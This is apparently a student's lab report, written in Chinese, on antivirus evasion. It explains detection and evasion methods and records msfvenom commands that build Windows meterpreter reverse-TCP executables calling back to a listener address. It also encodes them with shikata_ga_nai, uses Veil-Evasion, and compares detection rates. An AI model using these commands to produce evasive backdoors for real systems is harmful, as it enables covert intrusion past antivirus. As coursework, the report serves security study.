20145338 索朗卓嘎《网络攻防》 免杀原理与实践
实践内容:
(1)理解免杀技术原理(1分)
(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(2分)
(3)通过组合应用各种技术实现恶意代码免杀(1分)
(4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分)
报告内容:
`基础问题回答
(1)杀软是如何检测出恶意代码的?
根据特征来检测:对已存在的流行代码特征的提取与比对
根据行为来检测:是否有更改注册表行为、是否有设置自启动、是否有修改权限等等
(2)免杀是做什么?
免杀顾名思义就是免除计算机杀软的查杀。
通过一些手段来瞒过杀软的检测扫描。
(3)免杀的基本方法有哪些?
加花指令:就是加入一些花里胡哨的指令来迷惑杀软,让杀软检测不到特征码,比如+1,-1,*1,/1什么的,但是一些厉害的杀软还可以看破这些。
加壳:就是给含有恶意代码的程序加一个外包装,让杀软不知道里面装的是什么。但是这种方法逃不过内存查杀,一运行起来就会露出马脚。
修改特征码:就是在不影响程序功能的情况下,将杀软检测的那一段特征码改一下,从而瞒过杀软的检测。当然修改特征码不是一个容易的事情,但是却是唯一可以躲过内存查杀的办法。
`实践体会
做实验总是几经波折,谢谢在实验过程中不不厌其烦耐心帮助我的同学。通过这次实验了解了几种免杀技术,实验中使用了很多种杀毒软件,但能够真正杀毒成功的却只有几个,所以平时在使用电脑的时候真需要谨慎,不点开不明链接以及在正规网站下载软件,不能过分依赖杀毒软件,自己平常中也要多加注意。
实践过程
·首先使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.164 PORT=5338-f exe > slzgtest.exe生成meterpreter可执行文件。
接着利用http://www.virscan.org/这个网站检测一下有多少查毒软件可以将其查杀出来,发现39个杀毒软件中有21可以发现病毒。
·Msfvenom使用编码器生成meterpreter可执行文件
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.43.164 LPORT= 5338-f exe > sltest.exe命令生成编码过的可执行文件sltest.exe。
上传生成的可执行文件sltest.exe,发现39个杀毒软件其中20个软件发现有病毒.
使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.43.164 LPORT=5338 -f exe >slzg2.exe命令生成编码过的可执行文件slzg23test.exe
发现在39个杀毒软件中有22个软件发现有病毒.
·使用Veil-Evasion生成可执行文件
在kali中输入指令veil-evasion 进入Veil-Evasion
用python语言来编写。
在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里找到db.exe的文件夹,并且移动至win系统中。
通过上传软件发现39个杀毒软件中只有9个软件发现有病毒,相对于之前使用的两个方法相比这个的免杀效果更好。